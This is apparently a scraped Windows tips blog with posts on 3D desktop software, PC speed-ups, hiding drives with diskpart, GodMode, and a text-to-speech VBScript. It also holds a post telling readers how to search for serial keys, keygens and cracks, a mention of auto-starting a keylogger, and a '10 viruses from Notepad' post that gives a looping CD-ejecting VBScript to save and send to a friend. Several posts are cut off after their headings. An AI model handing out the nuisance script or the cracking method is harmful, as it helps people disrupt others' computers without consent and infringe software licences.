Give your Windows a 3D Look


Hii Friends...I hope you all are fine. I hope my previous posts were beneficial for you. Well, today I am back with an Amazing software named as T3Desk. It is a very Interesting software which helps you to give a 3D look to your Operating system. It gives a third dimension look to your Windows. It lets you give a Transparent look to your Windows. Well, it is a lightweight software. It is an unique application.



  
Using this software, your windows can be zoomed , Flipped , moved in almost anyway you want. You can surf more easily using T3Desk. You can also configure your windows Dimension looks, Transparency Effect and much more. This software will work on almost all versions of Windows.


              Official Site Download Link :-  Download T3Desk


Thank You.

10 Fast and Free Security Enhancements


Hi, Now I am Here to tell you about some Maintenance tips that can Protect your Pc and make your Pc as clean as Milk. But, these Methods can slow your pc.  Before you spend a Dime(Money) on security, there are many precautions you can take that will protect you against the most common threats.


15 Tips to Make your Pc Very Fast and Smooth


Hi Guys, Wanna make your PC run faster and smoother?  These are some small tips which make great impact on the performance of your computer. Everybody wants a PC which runs the way we want. A newly bought computer just impresses you, with its fast interface, quick reactions, negligible garbage, in short just like what a new computer should.


 But after using your computer for about a year or so, like me, you would also face some minor problems with your computer performance e.g. takes more time to boot up, hangs up very frequently, you see a large cluster of useless icons on your desktop, applications run slower, some even refuse to run. Innumerable problems are faced by all of us.
Now all of us won’t buy a new computer just for this reason, so what would you do? Format your hard disk? Probably, but who wants to lose precious data? There are many small things that PC users, don’t know about........ 
I am going to tell you, what I do to my own PC, to achieve the performance level I want from it. This doesn’t require much effort to follow these simple tips, nor do they require much time, but surely they increase our PC performance, your PC would surely run smoother and faster.

How To Hide Any Drive Through Command Prompt



Have you ever thought of hiding any drive from your system so that no one can knew about it. Yes Of-course.You may have heard or even used a lot of software’s that might be able to do that, but if you want to do things by your own without using any 3rd party software than this tutorial will show you how you can do it.
Well there are many ways of doing it, in this tutorial we are covering command prompt way of doing it.

Here is how to do it:

Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt
Step 2. In the Command Prompt, type Diskpart and hit enter key. If UAC (User Account
 Control), dialog-box prompts than click Yes.
Step 3. Then type List Volume and press enter, this will produce the list of all drives.



Step 4. Now select the drive which you want to hide, you can either do this by typing Select volume 2(i.e. Volume Number) or by typing Select Volume F(i.e. Drive letter)





Step 5. To hide a drive, type Remove Letter F. Here, F is the drive letter than you want to hide. You can use any drive letter you want.



Step 6. That’s it. You are done! F drive is now hidden


How to unhide hidden drive



Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4.
Step 2. To show the hidden drive type Assign Letter F and hit enter, now you can view F: drive in explorer.


That’s it. This is the way of hiding and un-hiding drives from explorer.


Thank You.


What is GodMode in Windows 7 ? How to Enable it ?



Here’s a neat Windows 7 trick that’s been doing the rounds on the Internet. It Enables “GodMode” a term devised by the Microsoft development team, which provides a single place to access all Windows settings without needing to browse options and folders in the Control Panel.




How To Make your Computer Talk



In this post I’m going to show you cool Windows trick that will make your computer talks what you type . This would be fun to do on someone else’s computer as a joke.
1. Open Notepad
2. Paste the following code :-
Dim Message, Speak
Message=InputBox("Enter Text to Talk o","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message

How To Get Serial Key, Keygen, Crack, Patch Of Any Software


Here is simple, but useful google search hack that will help you to find serial key, keygen, patch of any software that you want :-
You can do this for any Antivirus, tool, software to gain access for long time

1. Go to google.com
2.Type this syntax in search bar "94FBR Product name with desired software" for example :
  e.g:-     94fbr Internet Download Manager
              94fbr Avast
              94fbr Microsoft Office 2013
              Windows 7 94fbr etc.




How to run a program when Windows start


If you want to run a a program, song, video, game, keylogger or whatever you like when your Windows start. This is possible just in  few and very simple steps.
Go to START>AllPrograms>STARTUP
; in that folder add a shortcut to the 
program,audio or video file you want to run automatically.




After this, reboot your computer and the program will start along with windows. It will also appear on the Startup list in MSCONFIG.

Now you can start anything at startup automatically........ :)

10 Easy ways to make Viruses from Notepad

10 virus notepad script


Open Notepad and Type these Commands:-


1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.